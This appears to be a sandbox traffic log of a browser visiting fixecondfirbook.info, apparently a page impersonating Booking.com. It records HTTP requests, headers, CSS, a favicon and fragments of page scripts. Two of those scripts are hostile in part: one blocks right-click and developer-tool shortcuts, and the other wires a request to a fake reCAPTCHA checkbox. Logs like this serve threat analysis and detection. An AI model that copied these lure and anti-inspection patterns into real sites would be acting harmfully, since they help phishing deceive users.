2025-01-16 16:20:00 UTC	1369	IN	Data Raw: 72 5f 64 65 73 74 72 75 63 74 69 76 65 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 64 65 73 74 72 75 63 74 69 76 65 5f 6c 69 67 68 74 3a 20 23 66 63 62 34 62 34 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 64 65 73 74 72 75 63 74 69 76 65 5f 6c 69 67 68 74 65 72 3a 20 23 66 66 65 62 65 62 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 64 65 73 74 72 75 63 74 69 76 65 5f 6c 69 67 68 74 65 73 74 3a 20 23 66 66 66 30 66 30 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 63 61 6c 6c 6f 75 74 5f 64 61 72 6b 3a 20 23 62 63 35 62 30 31 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 63 61 6c 6c 6f 75 74 3a 20 23 66 66 38 30 30 30 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f Data Ascii: r_destructive: #c00; --bui_color_destructive_light: #fcb4b4; --bui_color_destructive_lighter: #ffebeb; --bui_color_destructive_lightest: #fff0f0; --bui_color_callout_dark: #bc5b01; --bui_color_callout: #ff8000; --bui_co
2025-01-16 16:20:00 UTC	1369	IN	Data Raw: 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 61 63 74 69 6f 6e 5f 6c 69 67 68 74 65 72 3a 20 23 65 34 66 34 66 66 3b 0a 20 20 20 20 20 20 2d 2d 67 65 6e 69 75 73 5f 63 6f 6c 6f 72 5f 70 72 69 6d 61 72 79 3a 20 23 30 30 34 63 62 38 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 62 61 73 65 6c 69 6e 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 70 61 64 64 69 6e 67 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 6e 65 67 61 74 69 76 65 5f 70 61 64 64 69 6e 67 3a 20 2d 31 32 70 78 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 6d 65 64 69 75 6d 5f 62 72 65 61 6b 70 6f 69 6e 74 3a 20 35 37 36 70 78 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 6c 61 72 67 65 5f 62 72 65 61 6b 70 6f 69 6e 74 3a 20 31 30 32 34 70 78 3b 0a 20 20 20 20 20 20 2d Data Ascii: --bui_color_action_lighter: #e4f4ff; --genius_color_primary: #004cb8; --bui_baseline: 24px; --bui_padding: 12px; --bui_negative_padding: -12px; --bui_medium_breakpoint: 576px; --bui_large_breakpoint: 1024px; -
2025-01-16 16:20:00 UTC	1369	IN	Data Raw: 6c 61 72 67 65 73 74 5f 6c 69 6e 65 5f 68 65 69 67 68 74 3a 20 34 30 70 78 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 66 6f 6e 74 5f 77 65 69 67 68 74 5f 6e 6f 72 6d 61 6c 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 66 6f 6e 74 5f 77 65 69 67 68 74 5f 6d 65 64 69 75 6d 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 66 6f 6e 74 5f 77 65 69 67 68 74 5f 62 6f 6c 64 3a 20 37 30 30 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 66 6f 6e 74 5f 73 74 61 63 6b 5f 73 61 6e 73 3a 20 22 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 22 2c 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 52 6f 62 6f 74 6f 22 2c 20 22 48 65 6c 76 65 74 69 63 61 22 2c 20 22 41 72 69 61 6c 22 2c 20 73 61 6e 73 2d 73 65 72 69 Data Ascii: largest_line_height: 40px; --bui_font_weight_normal: 400; --bui_font_weight_medium: 500; --bui_font_weight_bold: 700; --bui_font_stack_sans: "BlinkMacSystemFont", -apple-system, "Segoe UI", "Roboto", "Helvetica", "Arial", sans-seri
2025-01-16 16:20:00 UTC	1369	IN	Data Raw: 34 37 34 37 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 66 6f 72 65 67 72 6f 75 6e 64 5f 69 6e 76 65 72 74 65 64 3a 20 23 66 35 66 35 66 35 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 62 72 61 6e 64 5f 70 72 69 6d 61 72 79 5f 66 6f 72 65 67 72 6f 75 6e 64 3a 20 23 30 30 33 62 39 35 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 61 63 63 65 6e 74 5f 66 6f 72 65 67 72 6f 75 6e 64 3a 20 23 39 34 36 38 30 30 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 61 63 74 69 6f 6e 5f 66 6f 72 65 67 72 6f 75 6e 64 3a 20 23 30 30 36 63 65 34 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 63 61 6c 6c 6f 75 74 5f 66 6f 72 65 67 72 6f 75 6e 64 3a 20 23 39 32 33 65 30 31 3b 0a 20 20 20 20 20 20 2d 2d 62 Data Ascii: 4747; --bui_color_foreground_inverted: #f5f5f5; --bui_color_brand_primary_foreground: #003b95; --bui_color_accent_foreground: #946800; --bui_color_action_foreground: #006ce4; --bui_color_callout_foreground: #923e01; --b
2025-01-16 16:20:00 UTC	1369	IN	Data Raw: 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 6f 6e 5f 62 72 61 6e 64 5f 67 65 6e 69 75 73 5f 70 72 69 6d 61 72 79 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 62 61 63 6b 67 72 6f 75 6e 64 5f 69 6e 76 65 72 74 65 64 3a 20 23 31 61 31 61 31 61 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 34 37 34 37 34 37 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 74 72 61 6e 73 70 61 72 65 6e 74 3a 20 72 67 62 61 28 32 36 2c 20 32 36 2c 20 32 36 2c 20 30 29 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 62 61 63 6b 67 72 6f 75 6e 64 5f 61 6c 74 3a 20 23 66 35 66 35 Data Ascii: ackground: #fff; --bui_color_on_brand_genius_primary_background: #fff; --bui_color_background_inverted: #1a1a1a; --bui_color_background: #474747; --bui_color_transparent: rgba(26, 26, 26, 0); --bui_color_background_alt: #f5f5
2025-01-16 16:20:00 UTC	1369	IN	Data Raw: 74 69 76 65 5f 62 61 63 6b 67 72 6f 75 6e 64 5f 64 79 6e 61 6d 69 63 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 6f 6e 5f 62 72 61 6e 64 5f 70 72 69 6d 61 72 79 5f 62 61 63 6b 67 72 6f 75 6e 64 5f 64 79 6e 61 6d 69 63 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 62 72 61 6e 64 5f 70 72 69 6d 61 72 79 5f 62 61 63 6b 67 72 6f 75 6e 64 5f 64 79 6e 61 6d 69 63 3a 20 23 30 30 33 62 39 35 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 61 63 63 65 6e 74 5f 62 61 63 6b 67 72 6f 75 6e 64 5f 64 79 6e 61 6d 69 63 3a 20 23 66 66 62 37 30 30 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 63 61 6c 6c 6f 75 74 5f 62 61 63 6b 67 72 6f 75 6e 64 5f 64 79 6e 61 6d 69 63 3a 20 23 66 Data Ascii: tive_background_dynamic: #fff; --bui_color_on_brand_primary_background_dynamic: #fff; --bui_color_brand_primary_background_dynamic: #003b95; --bui_color_accent_background_dynamic: #ffb700; --bui_color_callout_background_dynamic: #f
2025-01-16 16:20:00 UTC	1369	IN	Data Raw: 62 6f 64 79 5f 31 5f 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 20 20 2d 2d 44 4f 5f 4e 4f 54 5f 55 53 45 5f 62 75 69 5f 73 6d 61 6c 6c 5f 66 6f 6e 74 5f 62 6f 64 79 5f 31 5f 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 53 65 67 6f 65 20 55 49 2c 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 2d 2d 44 4f 5f 4e 4f 54 5f 55 53 45 5f 62 75 69 5f 73 6d 61 6c 6c 5f 66 6f 6e 74 5f 62 6f 64 79 5f 32 5f 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 2d 2d 44 4f 5f 4e 4f 54 5f 55 53 45 5f 62 75 69 5f 73 6d 61 6c 6c 5f 66 6f 6e 74 5f Data Ascii: body_1_line-height: 24px; --DO_NOT_USE_bui_small_font_body_1_font-family: BlinkMacSystemFont, -apple-system, Segoe UI, Roboto, Helvetica, Arial, sans-serif; --DO_NOT_USE_bui_small_font_body_2_font-size: 14px; --DO_NOT_USE_bui_small_font_

Timestamp	Bytes transferred	Direction	Data
2025-01-16 16:20:01 UTC	542	OUT	GET /languageRevert.js HTTP/1.1 Host: fixecondfirbook.info Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://fixecondfirbook.info/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 16:20:01 UTC	967	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 16:20:01 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 874 Connection: close X-Powered-By: Express Cache-Control: public, max-age=14400 Last-Modified: Tue, 07 Jan 2025 11:10:39 GMT ETag: W/"36a-1944075a398" CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BtKyVLDxEB%2BFaTsV6a09YtyI2HoiY903cd%2Bs7NwahU9uOssLFjGmK8yGrFGC5EMfYhKbCMLzvos1GeCrFucJZQDC%2Fwd5d093bPdcG9xmidjL2BSJSVdqmJENckhGTNaz3N5D0CdJFw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902f6e36dac2aad0-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14292&min_rtt=14292&rtt_var=5359&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=1120&delivery_rate=204310&cwnd=32&unsent_bytes=0&cid=245239fdeb42e0ad&ts=385&x=0"
2025-01-16 16:20:01 UTC	402	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 72 65 76 65 72 74 4c 61 6e 67 75 61 67 65 43 68 61 6e 67 65 28 29 20 7b 0a 20 20 20 20 20 20 20 20 69 66 20 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 6c 61 6e 67 20 21 3d 3d 20 6f 72 69 67 69 6e 61 6c 4c 61 6e 67 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 6c 61 6e 67 20 3d 20 6f 72 69 67 69 6e 61 6c 4c 61 6e 67 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 0a 20 20 20 20 63 6f 6e 73 74 20 6f 72 69 67 69 6e 61 6c 4c 61 6e 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 6c 61 6e 67 3b 0a 0a 20 20 20 20 63 6f 6e 73 74 Data Ascii: (function() { function revertLanguageChange() { if (document.documentElement.lang !== originalLang) { document.documentElement.lang = originalLang; } } const originalLang = document.documentElement.lang; const
2025-01-16 16:20:01 UTC	472	IN	Data Raw: 5d 20 7d 29 3b 0a 0a 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6f 6e 74 65 78 74 6d 65 6e 75 27 2c 20 66 75 6e 63 74 69 6f 6e 28 65 76 65 6e 74 29 20 7b 0a 20 20 20 20 20 20 20 20 65 76 65 6e 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0a 20 20 20 20 7d 2c 20 66 61 6c 73 65 29 3b 0a 0a 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 6b 65 79 64 6f 77 6e 27 2c 20 66 75 6e 63 74 69 6f 6e 28 65 76 65 6e 74 29 20 7b 0a 20 20 20 20 20 20 20 20 69 66 20 28 28 65 76 65 6e 74 2e 63 74 72 6c 4b 65 79 20 7c 7c 20 65 76 65 6e 74 2e 6d 65 74 61 4b 65 79 29 20 26 26 20 65 76 65 6e 74 2e 73 68 69 66 74 4b 65 79 20 26 26 20 65 76 65 6e 74 2e 6b 65 79 2e 74 6f Data Ascii: ] }); document.addEventListener('contextmenu', function(event) { event.preventDefault(); }, false); document.addEventListener('keydown', function(event) { if ((event.ctrlKey \|\| event.metaKey) && event.shiftKey && event.key.to

Timestamp	Bytes transferred	Direction	Data
2025-01-16 16:20:01 UTC	542	OUT	GET /captchaHandler.js HTTP/1.1 Host: fixecondfirbook.info Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://fixecondfirbook.info/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 16:20:01 UTC	961	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 16:20:01 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 586 Connection: close X-Powered-By: Express Cache-Control: public, max-age=14400 Last-Modified: Tue, 07 Jan 2025 11:10:38 GMT ETag: W/"24a-19440759fb0" CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BNdIo1kK6uuc2BPw0m0K6NN9UD93F4LSMqSwSll9JwERUU46bLSve0itfgIR9CyL0udj91T95fBZyZ58msYB7j88bdDYtW311iwbJ4biAp96ceTAxAhC6tGT37Ep%2FYPJ4IIGY7WnmQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902f6e36a9535776-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8141&min_rtt=8132&rtt_var=3056&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=1120&delivery_rate=359075&cwnd=32&unsent_bytes=0&cid=b1212fbfa6db1aa1&ts=355&x=0"
2025-01-16 16:20:01 UTC	408	IN	Data Raw: 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 63 6f 6e 73 74 20 72 65 63 61 70 74 63 68 61 43 68 65 63 6b 62 6f 78 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 2e 72 65 63 61 70 74 63 68 61 2d 63 68 65 63 6b 62 6f 78 27 29 3b 0a 20 20 20 20 69 66 20 28 72 65 63 61 70 74 63 68 61 43 68 65 63 6b 62 6f 78 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 63 61 70 74 63 68 61 43 68 65 63 6b 62 6f 78 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 d0 9e d1 82 d0 bf d1 80 d0 b0 Data Ascii: document.addEventListener('DOMContentLoaded', function() { const recaptchaCheckbox = document.querySelector('.recaptcha-checkbox'); if (recaptchaCheckbox) { recaptchaCheckbox.addEventListener('click', function() { //
2025-01-16 16:20:01 UTC	178	IN	Data Raw: 20 69 66 20 28 72 65 73 70 6f 6e 73 65 2e 6f 6b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 27 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 27 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 0a 7d 29 3b 20 0a Data Ascii: if (response.ok) { console.log(''); } else { console.error(''); } }); }); }});

Timestamp	Bytes transferred	Direction	Data
2025-01-16 16:20:02 UTC	361	OUT	GET /captchaHandler.js HTTP/1.1 Host: fixecondfirbook.info Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 16:20:02 UTC	962	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 16:20:02 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 586 Connection: close X-Powered-By: Express Cache-Control: public, max-age=14400 Last-Modified: Tue, 07 Jan 2025 11:10:38 GMT ETag: W/"24a-19440759fb0" CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IWKeyHwRxRCpOosc7jzZj1V0ADQDirvvTHbjMvsORKUoVUzeQVs62jM4QVxutd%2BnSkInnNqVIa3YT1CLgC3vKkZSHIsF0KdZUx5tJjrUMb1Ka9nWAQDx%2Bca6Ag5SdmK6Ct2vili%2FcA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902f6e3c0e08dda4-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7923&min_rtt=7920&rtt_var=2977&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=939&delivery_rate=367295&cwnd=32&unsent_bytes=0&cid=c2c5eeefd2968730&ts=294&x=0"
2025-01-16 16:20:02 UTC	407	IN	Data Raw: 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 63 6f 6e 73 74 20 72 65 63 61 70 74 63 68 61 43 68 65 63 6b 62 6f 78 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 2e 72 65 63 61 70 74 63 68 61 2d 63 68 65 63 6b 62 6f 78 27 29 3b 0a 20 20 20 20 69 66 20 28 72 65 63 61 70 74 63 68 61 43 68 65 63 6b 62 6f 78 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 63 61 70 74 63 68 61 43 68 65 63 6b 62 6f 78 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 d0 9e d1 82 d0 bf d1 80 d0 b0 Data Ascii: document.addEventListener('DOMContentLoaded', function() { const recaptchaCheckbox = document.querySelector('.recaptcha-checkbox'); if (recaptchaCheckbox) { recaptchaCheckbox.addEventListener('click', function() { //
2025-01-16 16:20:02 UTC	179	IN	Data Raw: 20 20 69 66 20 28 72 65 73 70 6f 6e 73 65 2e 6f 6b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 27 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 27 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 0a 7d 29 3b 20 0a Data Ascii: if (response.ok) { console.log(''); } else { console.error(''); } }); }); }});

Timestamp	Bytes transferred	Direction	Data
2025-01-16 16:20:03 UTC	596	OUT	GET /favicon.ico HTTP/1.1 Host: fixecondfirbook.info Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://fixecondfirbook.info/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 16:20:03 UTC	946	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 16:20:03 GMT Content-Type: image/x-icon Content-Length: 610 Connection: close X-Powered-By: Express Cache-Control: public, max-age=14400 Last-Modified: Tue, 07 Jan 2025 11:10:39 GMT ETag: W/"262-1944075a398" CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zsji53f5NMpQkiT4MhpDGc1Q08oHOUOkzbBmn%2Bv95EN%2BWQHYE55H5jZOwkK4GDvbEc9RYiAq5%2Ff7OcZ%2FjywQdhpkPFA1axK6%2F5Q5p%2Bk2ZcmlUvku0oeb5Me9Y67lsaaD9bncXLLYbw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902f6e3fff32aabc-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14793&min_rtt=14196&rtt_var=6518&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=1174&delivery_rate=153894&cwnd=32&unsent_bytes=0&cid=615aa5d58e7ba1ed&ts=679&x=0"
2025-01-16 16:20:03 UTC	423	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 02 29 49 44 41 54 58 85 d5 97 3f 4c 1a 61 18 c6 7f 77 31 b0 1c 82 c9 0d 12 13 4b 53 89 9d 5a 18 ba 68 4d 8c 5d a4 8b ba d0 c1 10 b1 63 5d ba 52 17 16 db b9 31 76 a3 68 4c 17 bb c0 74 53 5b 5b aa 8b 83 d0 cd 48 83 31 69 5d 18 6c 64 b1 21 b1 03 70 70 78 fc b9 e3 e0 d2 67 e3 7b 73 f7 fc ee 7d bf ef 21 9f 40 4d d3 5b e3 c0 2e 30 05 0c d1 1f 95 81 43 20 c2 c1 da 39 80 50 35 0f 03 1f fa 68 ac 07 b2 cc c1 da 9e 50 fd f2 9f 03 34 6f 84 b8 27 52 69 fb a0 cd a9 7a ee 8a 54 66 6e 97 a6 44 ec f9 fa 9a 86 ba 32 f7 79 5d f8 46 87 35 6b fb c7 bf ac 21 e8 c6 3c 9b 7c 86 5b 72 e8 d6 d3 99 02 f1 f7 47 64 4f 8b a6 00 c4 76 45 8f e4 24 f5 26 d4 d2 1c 60 61 e6 2e fb 9b 8b Data Ascii: PNGIHDR szz)IDATX?Law1KSZhM]c]R1vhLtS[[H1i]ld!ppxg{s}!@M[.0C 9P5hP4o'RizTfnD2y]F5k!<\|[rGdOvE$&`a.
2025-01-16 16:20:03 UTC	187	IN	Data Raw: 61 00 43 23 68 de 64 d9 d3 a2 a6 23 66 d2 b0 e7 3d e0 69 13 d3 01 bf dc 71 6f 98 fe 2b f6 48 4e a2 4f ef 6b a2 3a db 90 8c db eb 4f d4 13 b3 a3 9c 10 dd f8 a4 fb 1e 81 e9 ad 9b 56 26 b3 c1 31 be 6c 2e 74 0d b5 14 53 48 65 0a 00 dc 7c 7f a1 a9 05 57 f7 74 73 c2 b2 63 b8 a3 9c a8 e6 7a 6a 95 92 3d 03 a4 33 05 96 62 ca ad 16 af be ae 07 d3 db 8f 3f 38 bb b8 d2 7d be ed 08 06 21 cb 46 f0 5f 03 94 6d f4 2f 8b 54 ee 6a 76 e9 50 04 22 d8 d3 85 32 10 11 ab b7 d4 e5 01 43 d4 2e a7 e7 82 ba 64 d3 f5 fc 1f 98 86 a2 c4 41 31 cb af 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: aC#hd#f=iqo+HNOk:OV&1l.tSHe\|Wtsczj=3b?8}!F_m/TjvP"2C.dA1IENDB`

Timestamp	Bytes transferred	Direction	Data
2025-01-16 16:20:03 UTC	629	OUT	GET /backend_static/common/flags/new/48-squared/us.png HTTP/1.1 Host: q-xx.bstatic.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://fixecondfirbook.info/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 16:20:03 UTC	768	IN	HTTP/1.1 200 OK Content-Type: image/png Content-Length: 642 Connection: close Server: nginx Date: Mon, 06 Jan 2025 04:05:32 GMT Last-Modified: Mon, 07 Sep 2020 09:08:23 GMT ETag: "5f55f887-282" Expires: Wed, 05 Feb 2025 04:05:32 GMT Cache-Control: max-age=2592000 access-control-allow-origin: * nel: {"report_to":"default","max_age":600} report-to: {"endpoints":[{"url":"https://nellie.booking.com/report"}],"max_age":600,"group":"default","failure_fraction":0.05} Accept-Ranges: bytes x-xss-protection: 1; mode=block timing-allow-origin: * X-Cache: Hit from cloudfront Via: 1.1 74cd4e6bd806cc7209ac94e0173f5ac8.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA56-P8 X-Amz-Cf-Id: xDNV9IayBfLCtxVvdXurUkPhcdeLKhMo1EW3YYnxFKyRVqHx5dg4bw== Age: 908071
